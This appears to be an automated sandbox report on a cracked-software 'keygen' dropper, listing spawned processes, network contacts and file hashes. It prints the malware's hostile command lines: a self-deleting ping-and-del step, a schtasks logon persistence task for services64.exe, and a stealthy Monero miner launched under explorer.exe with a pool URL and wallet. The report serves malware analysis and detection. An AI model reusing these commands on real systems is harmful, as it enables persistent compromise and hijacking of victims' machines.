PID 1476 wrote to memory of 3192 N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe C:\Users\Admin\AppData\Local\Temp\RarSFX1\md1_1eaf.exe
PID 1476 wrote to memory of 3192 N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe C:\Users\Admin\AppData\Local\Temp\RarSFX1\md1_1eaf.exe
PID 1476 wrote to memory of 3192 N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe C:\Users\Admin\AppData\Local\Temp\RarSFX1\md1_1eaf.exe
PID 2716 wrote to memory of 1508 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 2716 wrote to memory of 1508 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\PING.EXE

Uses Task Scheduler COM API

persistence

outlook_win_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe N/A

Processes

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\keygen.bat"

C:\Users\Admin\AppData\Local\Temp\keygen-pr.exe

keygen-pr.exe -p83fsase3Ge

C:\Users\Admin\AppData\Local\Temp\keygen-step-1.exe

keygen-step-1.exe

C:\Users\Admin\AppData\Local\Temp\keygen-step-6.exe

keygen-step-6.exe

C:\Users\Admin\AppData\Local\Temp\keygen-step-3.exe

keygen-step-3.exe

C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe

keygen-step-4.exe

C:\Windows\winnetdriv.exe

"C:\Users\Admin\AppData\Local\Temp\keygen-step-3.exe" 1731104981 0

C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe

"C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe"

C:\Users\Admin\AppData\Local\Temp\RarSFX1\Crack.exe

"C:\Users\Admin\AppData\Local\Temp\RarSFX1\Crack.exe"

C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe

C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe -txt -scanlocal -file:potato.dat

C:\Users\Admin\AppData\Local\Temp\RarSFX1\Crack.exe

"C:\Users\Admin\AppData\Local\Temp\RarSFX1\Crack.exe" -a

C:\Users\Admin\AppData\Local\Temp\RarSFX1\PBrowFile28.exe

"C:\Users\Admin\AppData\Local\Temp\RarSFX1\PBrowFile28.exe"

C:\Users\Admin\AppData\Local\Temp\chrome3.exe

"C:\Users\Admin\AppData\Local\Temp\chrome3.exe"

C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser188.exe

"C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser188.exe"

C:\Users\Admin\AppData\Local\Temp\2.exe

"C:\Users\Admin\AppData\Local\Temp\2.exe"

C:\Users\Admin\AppData\Local\Temp\setup.exe

"C:\Users\Admin\AppData\Local\Temp\setup.exe"

C:\Users\Admin\AppData\Local\Temp\jhuuee.exe

"C:\Users\Admin\AppData\Local\Temp\jhuuee.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\keygen-step-6.exe" >> NUL

C:\Users\Admin\AppData\Local\Temp\RarSFX1\md1_1eaf.exe

"C:\Users\Admin\AppData\Local\Temp\RarSFX1\md1_1eaf.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 4388 -ip 4388

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4388 -s 788

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 4388 -ip 4388

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4388 -s 824

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 4388 -ip 4388

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4388 -s 832

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 4388 -ip 4388

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4388 -s 848

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 4388 -ip 4388

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4388 -s 1140

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 492 -p 4388 -ip 4388

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4388 -s 1148

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 4388 -ip 4388

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4388 -s 1144

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit

C:\Windows\system32\schtasks.exe

schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'

C:\Users\Admin\AppData\Roaming\services64.exe

"C:\Users\Admin\AppData\Roaming\services64.exe"

C:\Users\Admin\AppData\Local\Temp\RarSFX1\f2217e5f.exe

"C:\Users\Admin\AppData\Local\Temp\RarSFX1\f2217e5f.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 1280 -ip 1280

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1280 -s 352

C:\Users\Admin\AppData\Local\Temp\RarSFX1\ss.exe

"C:\Users\Admin\AppData\Local\Temp\RarSFX1\ss.exe"

C:\Users\Admin\AppData\Local\Temp\RarSFX1\Setup.exe

"C:\Users\Admin\AppData\Local\Temp\RarSFX1\Setup.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit

C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe

"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"

C:\Windows\system32\schtasks.exe

schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'

C:\Windows\explorer.exe

C:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.office/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6BetGR/pnUtRI9a9x7kTNHhD/AzlqVRzHV746NYfGJ5T" --cinit-idle-wait=5 --cinit-idle-cpu=70 --tls --cinit-stealth

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 4388 -ip 4388

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4388 -s 1172

Network

Country Destination Domain Proto
US 8.8.8.8:53 kvaka.li udp
US 8.8.8.8:53 kvaka.li udp
US 8.8.8.8:53 iplogger.org udp
US 104.26.2.46:443 iplogger.org tcp
US 8.8.8.8:53 c.pki.goog udp
GB 142.250.187.227:80 c.pki.goog tcp
US 8.8.8.8:53 58.55.71.13.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 46.2.26.104.in-addr.arpa udp
US 8.8.8.8:53 227.187.250.142.in-addr.arpa udp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 evaexpand.com udp
GB 89.116.109.30:443 evaexpand.com tcp
US 8.8.8.8:53 live.goatgame.live udp
US 8.8.8.8:53 1.112.95.208.in-addr.arpa udp
US 8.8.8.8:53 30.109.116.89.in-addr.arpa udp
US 8.8.8.8:53 32.169.19.2.in-addr.arpa udp
US 104.26.2.46:443 iplogger.org tcp
US 8.8.8.8:53 qwertys.info udp
US 8.8.8.8:53 remotenetwork.xyz udp
US 208.95.112.1:80 ip-api.com tcp
RU 186.2.171.3:80 186.2.171.3 tcp
US 8.8.8.8:53 startupmart.bar udp
US 8.8.8.8:53 best-supply-link.xyz udp
RU 186.2.171.3:443 186.2.171.3 tcp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 2no.co udp
US 172.67.149.76:443 2no.co tcp
US 172.67.149.76:443 2no.co tcp
US 8.8.8.8:53 3.171.2.186.in-addr.arpa udp
US 8.8.8.8:53 76.149.67.172.in-addr.arpa udp
US 8.8.8.8:53 cleaner-partners.biz udp
US 8.8.8.8:53 live.goatgame.live udp
UA 194.145.227.161:80 tcp
US 8.8.8.8:53 qwertys.info udp
US 8.8.8.8:53 www.wpdsfds23x.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 oldhorse.info udp
US 8.8.8.8:53 live.goatgame.live udp
US 8.8.8.8:53 138.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 97.17.167.52.in-addr.arpa udp
US 8.8.8.8:53 qwertys.info udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 live.goatgame.live udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 qwertys.info udp
US 8.8.8.8:53 live.goatgame.live udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 qwertys.info udp
US 8.8.8.8:53 live.goatgame.live udp
UA 194.145.227.161:80 tcp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 qwertys.info udp
US 8.8.8.8:53 200.163.202.172.in-addr.arpa udp
US 8.8.8.8:53 241.42.69.40.in-addr.arpa udp
US 8.8.8.8:53 live.goatgame.live udp
US 8.8.8.8:53 98.117.19.2.in-addr.arpa udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 qwertys.info udp
US 8.8.8.8:53 live.goatgame.live udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 qwertys.info udp
US 8.8.8.8:53 one-online-gam3s.com udp
US 8.8.8.8:53 oneeuropegroup.xyz udp
US 8.8.8.8:53 gensolutions.bar udp
US 172.67.149.76:443 2no.co tcp
SG 37.0.10.214:80 tcp
US 8.8.8.8:53 live.goatgame.live udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 qwertys.info udp
US 8.8.8.8:53 live.goatgame.live udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 qwertys.info udp
UA 194.145.227.161:80 tcp
US 8.8.8.8:53 live.goatgame.live udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 qwertys.info udp
US 8.8.8.8:53 live.goatgame.live udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 qwertys.info udp
SG 37.0.10.244:80 tcp
US 8.8.8.8:53 live.goatgame.live udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 qwertys.info udp
US 8.8.8.8:53 sanctam.net udp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 raw.githubusercontent.com udp
US 185.199.110.133:443 raw.githubusercontent.com tcp
US 8.8.8.8:53 live.goatgame.live udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.110.199.185.in-addr.arpa udp
US 8.8.8.8:53 xmr-eu2.nanopool.org udp
FR 51.210.150.92:14433 xmr-eu2.nanopool.org tcp
US 8.8.8.8:53 pastebin.com udp
US 104.20.3.235:443 pastebin.com tcp
US 8.8.8.8:53 xmr-eu1.nanopool.org udp
PL 54.37.232.103:14433 xmr-eu1.nanopool.org tcp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 92.150.210.51.in-addr.arpa udp
US 8.8.8.8:53 235.3.20.104.in-addr.arpa udp
US 8.8.8.8:53 103.232.37.54.in-addr.arpa udp
US 8.8.8.8:53 qwertys.info udp
UA 194.145.227.161:80 tcp
US 8.8.8.8:53 live.goatgame.live udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 qwertys.info udp
US 8.8.8.8:53 live.goatgame.live udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 qwertys.info udp
US 8.8.8.8:53 live.goatgame.live udp
US 104.20.3.235:443 pastebin.com tcp
US 8.8.8.8:53 wfsdragon.ru udp
US 104.21.5.208:80 wfsdragon.ru tcp
MX 31.210.20.251:80 tcp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 208.5.21.104.in-addr.arpa udp
US 8.8.8.8:53 qwertys.info udp
US 8.8.8.8:53 live.goatgame.live udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 qwertys.info udp
US 8.8.8.8:53 live.goatgame.live udp
UA 194.145.227.161:80 tcp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 qwertys.info udp
US 8.8.8.8:53 43.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 live.goatgame.live udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 qwertys.info udp
US 8.8.8.8:53 live.goatgame.live udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 qwertys.info udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 qwertys.info udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
UA 194.145.227.161:80 tcp
US 8.8.8.8:53 qwertys.info udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 qwertys.info udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 live.goatgame.live udp
US 8.8.8.8:53 qwertys.info udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 qwertys.info udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
UA 194.145.227.161:80 tcp
US 8.8.8.8:53 qwertys.info udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 qwertys.info udp
US 8.8.8.8:53 staticimg.youtuuee.com udp

Files

memory/2788-0-0x0000000000B50000-0x0000000000B68000-memory.dmp

memory/3092-6-0x0000000000A10000-0x0000000000AF5000-memory.dmp

C:\Windows\winnetdriv.exe

MD5 265cadde82b0c66dc39ad2d9ee800754
SHA1 2e9604eade6951d5a5b4a44bee1281e32166f395
SHA256 40fd6a0b671a0e5074a206201f57f7731a0d01baab5874b28a9b0f019a451c5a
SHA512 c99f3a5464e1ac02402814401c2cb66a9fafb794356395c1081bdf3c4c3534086498c19efe4055780a52a1bb80db81658c2cb4af5271015af51edf7bd3865e7b

memory/212-18-0x0000000000B70000-0x0000000000C55000-memory.dmp

memory/720-27-0x0000000000400000-0x0000000000420000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe

MD5 51ef03c9257f2dd9b93bfdd74e96c017
SHA1 3baa7bee4b4b7d3ace13409d69dc7bcd0399ac34
SHA256 82a022b29bda763ef9f2ce01c82c82e199182d1d0243cca9811eccc1d993cecf
SHA512 2c97e5d08c9be89ca45153511e0976abfabf41e25d4187dcb7586ba125b6d8d763b99e79043ac1504203c26c7ab47a9246d9a0235b469f6c611703d4e2ae00e1

C:\Users\Admin\AppData\Local\Temp\RarSFX1\Crack.exe

MD5 7126148bfe5ca4bf7e098d794122a9a3
SHA1 3fe6be3ee8bf1a0c99139b146913c8c6acd7dd64
SHA256 f8c0350d71e5dd14438d477f73915c4845290c7f0620656624722183b76013f5
SHA512 0bec6450d1be17489436de7a5186dbcb88089edd4227c3b5484460c9368e5ca0a2d88c385d31989f449a5d8cc347057c80a997682d6c0ed1b9cfcb85c677eb48

C:\Users\Admin\AppData\Local\Temp\RarSFX0\JOzWR.dat

MD5 12476321a502e943933e60cfb4429970
SHA1 c71d293b84d03153a1bd13c560fca0f8857a95a7
SHA256 14a0fbd7eab461e49ee161ac3bd9ad8055086dbe56848dbaba9ec2034b3dea29
SHA512 f222de8febc705146394fd389e6cece95b077a0629e18eab91c49b139bf5b686435e28a6ada4a0dbb951fd24ec3db692e7a5584d57ffd0e851739e595f2bbfdc

memory/2288-65-0x0000000000400000-0x0000000000983000-memory.dmp

memory/2288-68-0x0000000000400000-0x0000000000983000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\RarSFX1\PBrowFile28.exe

MD5 8902f8193024fa4187ca1aad97675960
SHA1 37a4840c9657205544790c437698b54ca33bfd9d
SHA256 95de484851569f225488320d573e398ebc2312b2d85b6c2b255b63b21aebb82f
SHA512 c351204604cb24c45ddb26847a22f5487a2942ad2b2361dbd31ce0a308c281be91658907d7fe04b483f053b7f9b0c680cae11361709ba7552f7921e727241938

memory/2288-70-0x0000000000400000-0x0000000000983000-memory.dmp

memory/2288-84-0x0000000000400000-0x0000000000983000-memory.dmp

memory/4644-85-0x0000000000560000-0x0000000000736000-memory.dmp

memory/2288-87-0x0000000000400000-0x0000000000983000-memory.dmp

memory/2288-88-0x0000000000400000-0x0000000000983000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\chrome3.exe

MD5 4b0d49f7c8712d7a0d44306309f2e962
SHA1 5f0a2536f215babccf860c7ccdeaf7055bb59cad
SHA256 f996915ce7203dc3661afa686637426fab14c91682ada02054d2f64ce245af60
SHA512 50dc00bebdafdc2cc1792a45cab5f13773ff0026c20618eec29f50000261afba65f58cec5d30be0fd5aaea17cac30b97b16be70c6f430987cd10a8488948ee2b

memory/2660-99-0x0000000000CD0000-0x0000000000CE0000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser188.exe

MD5 13e802bd360e44591d7d23036ce1fd33
SHA1 091a58503734848a4716382862526859299ef345
SHA256 e24c3eda7673062c9b243a09bc91e608f4d9dcc5de27db025b5ad150ae014f2b
SHA512 8bb52a3b0852cc345be7d4b50b19c3778bcae5cb7ee654aced93772bee6fd22d1e87c484d91afb10af040d7c52b0f1e0b60de47a28d8eeea5e3c6afcead6163b

memory/2292-112-0x0000000000AB0000-0x0000000000AD0000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\2.exe

MD5 a5bace3c3c2fa1cb766775746a046594
SHA1 9998cad5ba39e0be94347fcd2a2affd0c0a25930
SHA256 617de4cdc27fb67b299a0d95ff2129d0ea2488040bcfd5f64868a0fab33af7a6
SHA512 66f0cb5b820014a8d73bab706de8138d22a4d690d77726ac53b785daf99ed45646c8b0236bf10e209039f78324a63c3ee1c2f7ccf852fa7d579753cb9f659184

memory/3592-123-0x0000000000D50000-0x0000000000D58000-memory.dmp

memory/2292-125-0x0000000001050000-0x000000000106A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\setup.exe

MD5 0ebb4afbb726f3ca17896a0274b78290
SHA1 b543a593cfa0cc84b6af0457ccdc27c1b42ea622
SHA256 2fd099e9c096efb59756565d50243387d7669d60c2088e842f1f5d9ef297b6d2
SHA512 284063f08667af11bc593dcb88f19d2bc6b9fd1e2edf368fdc78f07c9956fa3078673ee7dd7ca349e32cb1f848edfeab3b6a758eac5e5c3d36dc1a8764353d11

C:\Users\Admin\AppData\Local\Temp\jhuuee.exe

MD5 f9be28007149d38c6ccb7a7ab1fcf7e5
SHA1 eba6ac68efa579c97da96494cde7ce063579d168
SHA256 5f6fc7b3ebd510eead2d525eb22f80e08d8aeb607bd4ea2bbe2eb4b5afc92914
SHA512 8806ff483b8a2658c042e289149e7810e2fb6a72fb72adbf39ed10a41dbab3131e8dfdaca4b4dba62ed767e53d57bd26c4d8005ce0b057606662b9b8ebb83171

C:\Users\Admin\AppData\Local\Temp\RarSFX1\md1_1eaf.exe

MD5 f250a9c692088cce4253332a205b1649
SHA1 109c79124ce2bda06cab50ea5d97294d13d42b20
SHA256 0a6c3a23510f93fcdcb6d5acc53ccccbcc51c68f14b1bcbd758ffbf135f8e882
SHA512 80553664f188ae35cef1f89d188fb17df8a490367f8d6fa5f9897115bacf776373905bccd599353add684c7fa6c2554d04cbf1a7f6cc87b299d6c51da33c1b5e

memory/3192-149-0x0000000000400000-0x0000000000667000-memory.dmp

memory/2288-155-0x0000000000400000-0x0000000000983000-memory.dmp

memory/2288-156-0x0000000000400000-0x0000000000983000-memory.dmp

memory/2288-157-0x0000000000400000-0x0000000000983000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\RarSFX0\potato.dat

MD5 b6d8456dd71a141887ff55c3fec58b8a
SHA1 e45af060b95194f9b4d52ad0ad52591f0cf95e24
SHA256 cf5e6a7e14e41fdf5976c73ec8d618cb813358803fbb95051950a5431b9b219f
SHA512 eba967f519d9f19d5b31a7faca19105aa150b615249089f5068c0e264decceaef45c1e8016526529c2a9e05c70c6e288c3573b463ef5395fda6131420b9f38a1

memory/3192-164-0x0000000000400000-0x0000000000667000-memory.dmp

memory/4388-163-0x0000000000400000-0x0000000002B59000-memory.dmp

memory/2660-167-0x0000000001570000-0x000000000157E000-memory.dmp

memory/2660-168-0x00000000015A0000-0x00000000015B2000-memory.dmp

memory/3192-180-0x0000000003AC0000-0x0000000003AD0000-memory.dmp

memory/3192-186-0x0000000004560000-0x0000000004568000-memory.dmp

memory/3192-173-0x0000000003950000-0x0000000003960000-memory.dmp

memory/3192-187-0x0000000004580000-0x0000000004588000-memory.dmp

memory/3192-192-0x0000000004780000-0x0000000004788000-memory.dmp

memory/3192-193-0x0000000004780000-0x0000000004788000-memory.dmp

memory/3192-189-0x0000000004620000-0x0000000004628000-memory.dmp

memory/3192-194-0x0000000004A30000-0x0000000004A38000-memory.dmp

memory/3192-195-0x0000000004930000-0x0000000004938000-memory.dmp

memory/3192-196-0x0000000004790000-0x0000000004798000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\RarSFX1\d.jfm

MD5 f605f37b631b7ef1190a8e294121056a
SHA1 0ba9ec5226bd03b308f47a550f290ac284481c02
SHA256 956de59e90df0da7edb5f17baa21ac7150daa892197a63aeff24ce3951bf5cc3
SHA512 5b03286ef60f86bdabba20a7278ff14c9f86e30d622596825f5bf418f7778438224c4736e9360b866d266d2aea271143d135f5d364e7c6c36c797558e8dee4a7

memory/3192-209-0x0000000004580000-0x0000000004588000-memory.dmp

memory/3192-217-0x0000000004790000-0x0000000004798000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\RarSFX1\d.jfm

MD5 c0afa1ce80c2c414f9bb4644977e6c76
SHA1 635e333561061a0df87e330df8c2e84896cf9477
SHA256 42dd35b5f0bcefa0cb2b05b8886462d849ee3e8822eb592a38f75200bef78b29
SHA512 9117143495c2796a9847d67119120fb499635bcab671650af996e6145d64d22979643919fbf2e309e355266bd7a9d2baaaeea6de9e114b1f797757f3cdd0ea16

memory/3192-232-0x0000000004580000-0x0000000004588000-memory.dmp

memory/3192-240-0x00000000048C0000-0x00000000048C8000-memory.dmp

memory/3192-219-0x00000000048C0000-0x00000000048C8000-memory.dmp

memory/3192-242-0x0000000004790000-0x0000000004798000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\RarSFX1\d.jfm

MD5 3bb4b4505ce6c5738c72dec43ab484f5
SHA1 683df579e991662847c47512c76f2d63cc71ffe5
SHA256 2aa3799965a5ac0c627169a3b0f4fb35129ea0c8183e32d68c9ae3c363ab3aa5
SHA512 aa1ca7b7af8f00738ad1c9b38dd8fc211e0c585c422af3fa54607eafc313c14af11df4a17208837fdae790c37ae1748b7bcefac30b6b6858d0f1ec080f8884fc

C:\Users\Admin\AppData\Local\Temp\RarSFX1\d

MD5 1842e65634f9f62d8bb51b0d914e4f47
SHA1 ea58c7d9d5d6c269de19cd8ad3fc9b451fcde7e6
SHA256 26e0a6441dd096bf405a25648aa68c4a9ec20c12e6268413c1b303825a1e6bec
SHA512 4a50e8c42da257287055f88369528eca7784ff0fb8b749b60f4324b312e85a6f6b500179178a9e382a93518650920e45fb0c985ad58caf31269cae05219e8661

C:\Users\Admin\AppData\Local\Temp\RarSFX1\d.jfm

MD5 9bca4bb723492631598e89c7db9177a3
SHA1 22d73a5b0c27af1d016df8518e7786e3c1201399
SHA256 ca8847bba444075938a8f2c7b29e3ecee3362a850a6b9f3b4f9d66532e731c8d
SHA512 6b6e73986e2217258442156c3c9c3f9b8892d804fda1434f6856c675795227797c88b26f08c475965518acf8f4e714f1ed199d985fa1a189c3a919c6923dc4af

C:\Users\Admin\AppData\Local\Temp\RarSFX1\d.jfm

MD5 4a004655563d2e95bea768490e3acfa8
SHA1 c51e6a524ba74e0cacdd2d4c6a9f02f16d51210b
SHA256 25222fa360b5fd1e03473c31f1aee17aea21d2f70b5c1a3065ab7a96e9eb5599
SHA512 3519c57a0d11f938a93bc37faa4b911c5ea1f4329b4c09129ff7d401f1c7631f2d009cf117fd7bb10d6942af47c418b8932cd742e57a60f9cb49019a0c5ab6b8

C:\Users\Admin\AppData\Local\Temp\RarSFX1\d.jfm

MD5 48b6e48be491b062f6a0d939ca66fbfc
SHA1 0f2d8430072da3af55040bdcf67e2b8e96b229b0
SHA256 0eb3cc70d19b9523295e17561720f312901a24a52084cb4c2790eb0d973095a2
SHA512 53df084a7a04839507824711b3c5ab6c2f370eb1e13dd725b489d46cae1c8f6f0017cc0f9b6a2d043d18ebc0d22c3a886c4bced0aea2e17e2d58bf6eb7691c31

C:\Users\Admin\AppData\Local\Temp\RarSFX1\d.jfm

MD5 badf5bb987052f11491f39872ffd2169
SHA1 13ba38f04fd3fd4e204464d808b1cbcbb8b5f7a1
SHA256 daed536fc3bcd25f337d5f48e9a6435f5eca0e89c18410659fb8540e0c095eb6
SHA512 3b160543de68bc536e2c396fd3601a29ac4d3a535ebf90900a3cbd5a7d1831445ea90974cc3570924b3ce30fa42ae81dfef1ee065732ff7e6180ca4ee5c2b12c

C:\Users\Admin\AppData\Local\Temp\RarSFX1\d.jfm

MD5 508ba0fe68175e182e5e14696119a9bc
SHA1 570d750e200f9715259abf48e5c31638e3a50d51
SHA256 e49b5782d78b7a99c21697a208396f38fe7535ec7a8db6f01e7bd24f86b62848
SHA512 1a72742189ce2f321bff35321b12e6161a9d110dd6820e7df6de30b96835928302c3c129f33b64ea189fb6fee071cbab12a6c954e588de223d713bca0196c5b8

C:\Users\Admin\AppData\Local\Temp\RarSFX1\d.jfm

MD5 24433079eb159fdce544f6a097ab1242
SHA1 0a8233bc76442383c2743e0962423b429bb7bfc3
SHA256 183713c6b7c759ff2958341dd8f6d95a9ed69cce2d58d6788a90bf2f423be11b
SHA512 c818889cffa0f582b4933897ae2d4484d1202484ed467b6c69daeb0ec80a93432b25dcd8ba8c72846632c3c57185b5b5ef02e41fa7de71747337a2c1061f2a24

C:\Users\Admin\AppData\Local\Temp\RarSFX1\d.jfm

MD5 9d3072fbbb780c2b6584e0611445304e
SHA1 e700df586350b43928d099ce4273ee47357ab1c9
SHA256 26b45ad09979a87d71923dac6576609caa94639b9261f48723e6dfb48f8dd069
SHA512 d243c02cd4b7638465b96cbdc06b068f67e81684e14ce6dd36e5b2395e01ff000e39e1bcabd94932c5df883617e90bc0ec1197b6730b2d6790a1756e2fbcba28

C:\Users\Admin\AppData\Local\Temp\RarSFX1\d.jfm

MD5 d655a9a0a5949af145903267d3de4dcc
SHA1 1c5d7526835eb963b14cc55238ba80afaefd1ad3
SHA256 1a282b415fdd26b43b120a70bc41f4e3f2214d07b739a4f694c476f2c44320c6
SHA512 2e33690dd22878e9dff391eeb5111edb29cf8cdb8a4b022828362c78c889d1a275765342890c4e483757d1bc9f11a1c82f0be3a7791cf3a9106fd3f6019a9a74

C:\Users\Admin\AppData\Local\Temp\RarSFX1\d.jfm

MD5 211353552e7001eb427f834fd0f8732e
SHA1 32b990884120e6710d4714c6a2825f4a7da68513
SHA256 0f38ab220f2c093272f6dc73ffae476568b450aedba194a3d08504535f39ce6d
SHA512 1c27e2a8fbd9a099c8daf195c3ccac3025dcfa2e0794b98ae2156b6cbb7028224d773f91b9fd6654a20e2ef9761859e4b4b7a58b9c7f590488c4e8f6fba80087

C:\Users\Admin\AppData\Local\Temp\RarSFX1\d.jfm

MD5 d25f8d4f11fa06b0a0c7924aa7e62bd1
SHA1 c37dd0cfd33abbd9e142af343f855444f8dc2eaf
SHA256 52624dd8cc8593ebcc06e6c81260fe5857bc68e3f52242884db957f81def0630
SHA512 c7f59de9b75d49f74f99b3c4e8548812206175b40c1f62ee84aa7c61c6046df3dc7e67b6769a51819886a4f2aecf5d379334e2deb3feb42e22dd242872627ee0

C:\Users\Admin\AppData\Local\Temp\RarSFX1\d.jfm

MD5 9c0b4e94b57eb9472488a697c93d4247
SHA1 d83c839d80778e2c70050212c672bd0199f068b2
SHA256 537ae468423b64e726bdc282ef30fb18b261dbc21af4884a7c7eac4b1fe7bada
